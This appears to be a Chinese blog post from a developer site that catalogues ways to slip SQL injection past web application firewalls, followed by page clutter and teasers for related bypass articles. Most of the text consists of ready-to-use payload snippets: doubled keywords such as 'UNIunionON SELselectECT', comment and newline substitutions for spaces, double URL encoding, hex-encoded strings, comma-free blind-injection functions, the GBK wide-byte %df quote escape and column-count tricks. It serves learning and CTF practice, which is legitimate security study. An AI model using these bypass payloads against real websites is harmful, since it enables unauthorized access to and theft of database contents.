40. 注入篇——绕过WAF继续注入

最新推荐文章于 2024-05-07 21:30:00 发布
最新推荐文章于 2024-05-07 21:30:00 发布
阅读量1k 收藏 3
点赞数

1.WAF过滤机制:

1.异常检测协议–拒绝不符合HTTP标准的请求; 
2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证; 
3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题; 
4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活; 

5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视和信息泄露保护等。

2.WAF绕过姿势

(1)大小写绕过

此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤只过滤其中一种。 

这里有道题:http://wargame.kr:8080/login_filtering/

(2)替换关键字

这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过

http://www.xx.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

(3)空格绕过

payload

select/**/*/**/from/**/yz;
select%0a*%0afrom%0ayz; %0a 是回车
/*!select*//*!**//*!from*//*!yz*/;

select(a)from(yz);
select(a)from(yz)where(a=1);

(4)替换关键字 

这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过

SELselectECT 1,2,3,4

(5)URL编码

有时后台界面会再次URL解码所以这时可以利用二次编码解决问题 
后台语句

$insert=$link->query(urldecode($_GET['id']));
$row=$insert->fetch_row();
select * from yz
select * from  %2579%257a

(6)十六进制绕过(引号绕过)

在SQL语句的数据区域可以采用十六进制绕过敏感词汇

select a from yz where b=0x32;
select * from yz where b=char(0x32);
select * from yz where b=char(0x67)+char(0x75)+char(0x65)+char(0x73)+char(0x74)



select column_name  from information_schema.tables where table_name="users"
select column_name  from information_schema.tables where table_name=0x7573657273

(7)逗号绕过

在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决。 

substr(),mid()

mid(user() from 1 for 1)
substr(user() from 1 for 1)
select substr(user()from -1) from yz ;
select ascii(substr(user() from 1 for 1)) < 150;

同时也可以利用替换函数
select left(database(),2)>'tf';

limit

selete * from testtable limit 2,1;
selete * from testtable limit 2 offset 1;

(8)比较符(<,>)绕过

同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest,strcmp来进行绕过了。

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
select strcmp(left(database(),1),0x32);#lpad('asd',2,0)
if(substr(id,1,1)in(0x41),1,3)

新学习了一种骚骚的注入姿势in、between、order by 

select * from yz where a in ('aaa'); 
select substr(a,1,1) in ('a') from yz ;

select * from yz where a between 'a' and 'b'; 
select * from yz where a between 0x89 and 0x90;

select * from yz union select 1,2,3 order by 1;

也可以用like,根据排列顺序进行真值判断

(9)注释符绕过

在注入时的注释符一般为# --当两者不能用时就不能闭合引号 
这里介绍一个奇淫巧技 

select 1,2,3 from yz where '1'/1=(1=1)/'1'='1'
(1=1)中就有了判断位为下面的注入打下基础

(10)宽字节绕过

字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在%df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。

注:`select`防止用户自定义的名称和mysql保留字冲突

(11)with rollup

一般结合group by使用

 select 1 as test from  yz group by test with rollup limit 1 offset 1;
+------+
| test |
+------+
| NULL |
+------+

(12)无列名注入

给未知列名起别名 

select a from (select 1,2,3aunion select * from yz)v;

(13) 判断列数绕过

当order by 被过滤后就可以使用into 变量来绕过 

select * from yz limit 1,1 into @a,@b,@c;




FLy_鹏程万里
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sqli-labs.zip
01-25
《SQL注入实战演练平台——sqli-labs详解》 SQL注入(SQL Injection)是一种常见的网络安全漏洞,攻击者可以通过输入恶意的SQL代码来获取、修改、删除数据库中的敏感信息,甚至控制整个服务器。为了帮助安全研究...
WEB渗透——新手入门之初级工具利用
01-16
5. **CSRF测试**:CSRF防护通常依赖于令牌验证,测试者需要检查是否容易绕过这些防护,例如使用Fiddler或Burp Suite拦截和修改请求。 6. **权限提升**:一旦找到漏洞,渗透测试者会尝试利用它们提升权限,如通过...
WAF绕过小技巧
tomyyyyy
09-22 6723
一、WAF绕过 1、脏数据绕过 即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。 例如,当发现某网站存在一个反序列化漏洞时,但是无回显,被waf拦截了 利用脏数据插入5000个x字符,可以成功绕过。 2、高并发绕过 对请求进行并发,攻击请求会被负载均衡调度到不同节点,导致某些请求绕过waf的拦截 3、http参数污染...
常见的WAF绕过方法
武天旭的博客
02-11 1万+
文章通过网络架构层、HTTP协议层、第三方应用层讲解了绕过WAF的常见方法 一、网络架构层 一般通过域名指向云WAF地址后反向实现代理,找到这些公司的服务器的真实IP即可实现绕过。 具体方法如下: 1、查找相关的二级域名及同一域名注册者的其他域名解析记录。 2、通过查看邮件MX解析记录来发现真实服务器的IP记录或网段,例如: windows可以执行命令: nslookup -qt=mx baidu.com Linux可以执行如下命令来查看baidu.com域名的MX解析...
网络安全各类WAF绕过技巧
最新发布
2401_84466325的博客
05-07 1892
当发送的内容太大,超过一个http包容量,需要分多次发送时,值会变成keep-alive,即本次发起的http请求所建立的tcp连接不断开,直到所发送内容结束Connection为close为止。HTTP头里的Content-Type一般有application/x-www-form-urlencoded,multipart/form-data,text/plain三种,其中multipart/form-data表示数据被编码为一条消息,页上的每个控件对应消息中的一个部分。编码过程中长度需包括空格的长度。
绕过 Web 应用程序防火墙 (WAF) 的 5 种方法
MachineGunJoe666
06-06 3141
WAF 是一种网络安全解决方案,用于过滤和阻止恶意网络流量。常见的供应商包括 CloudFlare、AWS、Citrix、Akamai、Radware、Microsoft Azure 和 Barracuda。根据防火墙使用的机制组合,绕过方法可能会有所不同。例如,WAF 可能使用正则表达式来检测恶意流量。正则表达式用于检测字符串中的模式。您可以在此处阅读有关它们的更多信息。WAF 还可以采用基于签名的检测,其中已知的恶意字符串被赋予存储在数据库中的签名,防火墙将根据数据库的内容检查 Web 流量的签名。
SQL 注入绕过(五)
不秃头的程序Yang
06-27 1503
2、实操 2、实操
渗透测试-SQL注入手法与绕过手段
Sgirll的博客
06-17 856
union select 1,group_concat(table_name),3:使用 UNION 操作符,这部分查询语句返回一个包含三列数据的结果集:第一列是数字 1,第二列是目标数据库中所有数据表的名称列表,这里使用了 GROUP_CONCAT 函数进行聚合拼接,第三列是数字 3。该攻击利用了 SQL 注入漏洞,通过修改原有的 SQL 语句,绕过了应用程序的输入校验机制,从而对目标数据库造成了安全风险。id=1:假定这是一个 Web 应用程序的 URL 查询字符串参数,指定了 id 参数的值为 1。
旧瓶装新酒——WAF还能玩出哪些新花样.pdf
09-11
以Shellshock漏洞为例,简单的规则修改往往不足以抵挡所有可能的绕过方法。此外,过度依赖正则表达式匹配也存在问题,因为正则表达式的表达能力有限,难以应对复杂漏洞建模。 面对这些挑战,WAF需要采用更为智能的...
K8_Struts2_EXP S2-045 20170310.rar
03-31
由于OGNL(Object-Graph Navigation Language)是Struts2中用于表达式语言的组件,恶意用户可以通过OGNL表达式来绕过安全控制,注入并执行恶意代码。 该描述提到的"Struct 2 S2-045/046 漏洞检测工具"是一个用于...
番外:打破基于OpenResty的WEB安全防护(CVE-2018-9230)1
08-03
然而,它在处理URI参数时存在一个安全漏洞,即CVE-2018-9230,该漏洞允许远程攻击者绕过基于OpenResty的安全防护措施,影响到使用OpenResty的多款开源Web应用防火墙(WAF)。 漏洞的根本原因在于OpenResty的两个...
【超详细版】SQL注入原理及思路绕过(看这就够了)
热门推荐
fly_enum的博客
12-30 1万+
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
(18)【WAF绕过WAF部署、绕过分析和原理、注入绕过WAF方法
02-27 6839
WAF绕过
SQL注入的一般方法总结(含WAF绕过) ctf
NLost
03-20 6841
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器 上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 下面分享几种常见的SQL注入常见绕过方法:以下以 **index.php?id=1** 为例绕过
sql注入waf
YouthBelief的博客
10-13 2667
sql注入waf 安全狗3.5 1.内联注释+5五位数+%23+%0a 绕过 ?id=1 union select 1,2,3; 会被拦截 经过测验 union select 函数被拦截 构造 /*!06447%23%0a*/select 即可绕过 安全狗4.0 ?id=1 union select 1,2,3; 会被拦截 3.5版本绕过方法 失败 payload union /*!--+/*%0a select /*!1,2,*/3 分析 union /*! --+/*%0a
WAF绕过
Z_l123的博客
02-19 1918
实验原理 WAF (Web Application Firewall)的中文名称叫做"Web应用防火墙",通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止SQL注入,跨站脚本(XSS)、文件包含和安全配置错误等漏洞引发的攻击。 作为攻击者来说,常见的绕过WAF的方式包括大小写变换、编码、重写、巧用注释符、巧用盲注、同功能函数替换等。其中,重写适用于WAF只过滤一次敏感字的情况。比如 WAF过滤敏感字union,但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执行
WAF绕过思路
永远是少年
03-12 3519
WAF绕过思路 WAF在渗透测试中,是我们要面对的第一关卡,渗透测试人员对站点WAF绕过过程就是渗透测试人员与网站管理员(或WAF开发者)进行PK的过程。在对WAF的渗透时,一般可以考虑采用以下方式展开。 一、增加WAF负担 WAF是为网站安全服务的,但是WAF的存在如果干扰了网站的正常运行,则会得不偿失,因此,网站管理员一般会恰当的配置WAF,起到在不会干扰网站正常运行的前提下,对用户的输入进行过滤的作用。因此,有些WAF就会设置如果数据包长度过长,就对部分数据包或者是数据包的部分内容进行无检测“放行”
sqlmap之绕过安全狗
qq_50854662的博客
01-05 6045
sqlmap之绕过安全狗
SQL注入(7)
qq_56289291的博客
07-28 154
SQL注入绕过手段 大小写绕过 如果程序中设置了过滤关键字,但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只是对整体进行过滤。例如:and 过滤。当然这种过滤只是发现关键字出现,并不会对关键字处理。 通过修改关键字内字母大小写来绕过过滤措施。例如:AnD 1=1 例如:在进行探测当前表的字段数时,使用order by 数字进行探测。如果过滤了order ,可以使用OrdER来进行绕过。 双写绕过 如果在程序中设置出现关键字之后替换为空,那么SQL注入攻击也不会发生。对于这样的过滤策略可以使用双
突破WafBypass思维:SQL注入策略与云WAF分析
“我的WafBypass之路”提供了关于WAF防护机制、工作原理以及SQL注入绕过策略的实用知识,对于网络安全专业人士和研究人员来说具有很高的参考价值。通过学习和实践,读者可以提升在对抗WAF时的应对能力,同时增强...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值